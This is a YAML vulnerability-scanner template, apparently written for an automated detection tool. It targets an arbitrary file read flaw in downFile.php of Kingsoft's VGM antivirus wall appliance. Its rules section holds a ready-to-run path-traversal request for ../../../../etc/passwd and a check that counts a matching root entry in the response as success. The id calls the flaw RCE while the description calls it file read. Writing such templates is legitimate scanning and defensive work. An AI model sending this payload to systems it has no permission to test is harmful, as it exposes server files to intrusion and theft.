id: kongsoft-vgm-antivirus-wall-rce

info:
  name: 金山 VGM防毒墙 downFile.php 任意文件读取
  author: zan8in
  severity: high
  verified: false
  description: |
    金山 VGM防毒墙 downFile.php文件存在任意文件读取漏洞，攻击者通过漏洞可以获取服务器任意文件
    "金山VGM"
  
rules:
  r0:
    request:
      method: GET
      path: /downFile.php?filename=../../../../etc/passwd
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()